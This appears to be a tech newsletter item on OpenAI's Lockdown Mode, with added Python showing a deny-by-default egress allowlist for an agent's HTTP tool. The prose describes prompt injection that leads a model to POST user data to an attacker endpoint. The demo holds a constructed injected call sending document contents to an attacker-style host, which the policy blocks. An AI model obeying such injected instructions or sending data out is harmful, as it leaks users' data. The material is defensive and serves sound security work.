This week's tooling news splits cleanly between defense and deployment: OpenAI shipped a deterministic network layer that actually closes a real attack vector, and Google dropped Gemma 4 checkpoints small enough to run on a phone without the quality hit that usually comes with post-training quantization. Alongside those, there's a PR auditor that catches the specific ways AI agents fake passing tests, a memory layer that keeps coding agents grounded to your actual codebase, and a Vercel billing change worth modeling before your next billing cycle.

OpenAI Blocks Data Exfiltration in Lockdown Mode

Lockdown Mode restricts outbound network requests from ChatGPT, cutting off the exfiltration path that makes prompt injection attacks genuinely dangerous. Without it, a malicious payload in untrusted content—a document, a webpage, a user message—can instruct the model to POST your data to an attacker-controlled endpoint. With Lockdown Mode enabled, that network call doesn't go out.

The reason this matters more than most AI safety features is that it's not ML-based. There's no classifier to jailbreak, no embedding to confuse. It's a network filter: deterministic, auditable, and not subject to adversarial prompting. That makes it one of the few mitigations in this space that you can actually rely on. It's rolling out across all ChatGPT tiers now.
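To make the "deterministic, not ML-based" point concrete, here is an added example of the same design applied to an agent's HTTP tool: a deny-by-default egress policy that decides purely from the request destination, so nothing in the prompt or in fetched content can influence the verdict. This is illustrative code written for this newsletter, not OpenAI's Lockdown Mode implementation (whose internals the announcement doesn't describe). The allowlisted host, the tool-call dictionary shape, and the injected `transport` hook are all assumptions.

```python
"""Deny-by-default egress policy for an agent's HTTP tool.

Added example (not OpenAI's code). Models the property the text describes:
the allow/deny decision is a function of the destination only, never of
model output or prompt text, so an injected instruction cannot argue its
way past it. All hostnames below are constructed.
"""
import ipaddress
import logging
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import urlsplit

log = logging.getLogger("egress")

# Constructed allowlist: the only destination the tool may contact.
DEFAULT_ALLOWLIST = frozenset({"api.internal.example"})


@dataclass(frozen=True)
class EgressDecision:
    allowed: bool
    reason: str
    host: Optional[str] = None


def evaluate_egress(url: str, allowlist=DEFAULT_ALLOWLIST) -> EgressDecision:
    """Decide from the destination alone. Prompt text is not an input."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return EgressDecision(False, f"scheme {parts.scheme!r} not permitted")
    # urlsplit().hostname strips userinfo, so "https://trusted@evil/" resolves
    # to "evil", closing the classic allowlist-by-prefix mistake.
    host = parts.hostname
    if not host:
        return EgressDecision(False, "no host in URL")
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # not an IP literal, continue to the allowlist check
    else:
        return EgressDecision(False, "IP-literal destinations are denied", host)
    if host not in allowlist:
        return EgressDecision(False, "host not on allowlist", host)
    return EgressDecision(True, "allowed", host)


def run_tool_call(call: dict, lockdown: bool = True,
                  transport: Optional[Callable[[dict], dict]] = None) -> dict:
    """Execute a model-issued HTTP tool call under the egress policy.

    `call` is the structured tool call the model emitted (assumed shape:
    {"method": ..., "url": ..., "body": ...}). `transport` performs the real
    request and is injected so the example runs offline. Returns an audit
    record; blocked attempts are logged because a model suddenly trying to
    reach an unknown host is the detection signal for a successful injection.
    """
    url = call["url"]
    if lockdown:
        decision = evaluate_egress(url)
    else:
        decision = EgressDecision(True, "lockdown disabled")
    record = {"url": url, "allowed": decision.allowed,
              "reason": decision.reason, "host": decision.host, "response": None}
    if not decision.allowed:
        log.warning("egress blocked: %s (%s)", url, decision.reason)
        return record
    if transport is not None:
        record["response"] = transport(call)
    return record


def demo() -> list:
    """Constructed scenario: one legitimate call, one that an instruction
    hidden in a fetched document might cause the model to emit."""
    legit = {"method": "GET", "url": "https://api.internal.example/v1/tickets"}
    injected = {"method": "POST", "url": "https://collector.attacker.example/drop",
                "body": "<constructed placeholder for document contents>"}

    def fake_transport(c: dict) -> dict:  # stands in for a real HTTP client
        return {"status": 200, "method": c["method"]}

    return [run_tool_call(legit, transport=fake_transport),
            run_tool_call(injected, transport=fake_transport)]


if __name__ == "__main__":
    for record in demo():
        print(record)
```

The design choice worth copying is the signature of `evaluate_egress`: it takes a URL and an allowlist, nothing else, so there is no channel through which model-visible text can change the outcome. The same function also refuses plain `http://` and raw IP destinations, two common ways an allowlist gets sidestepped. What it does not do is stop the injection itself; it only removes the outbound channel, which is exactly the scope the announcement claims for Lockdown Mode.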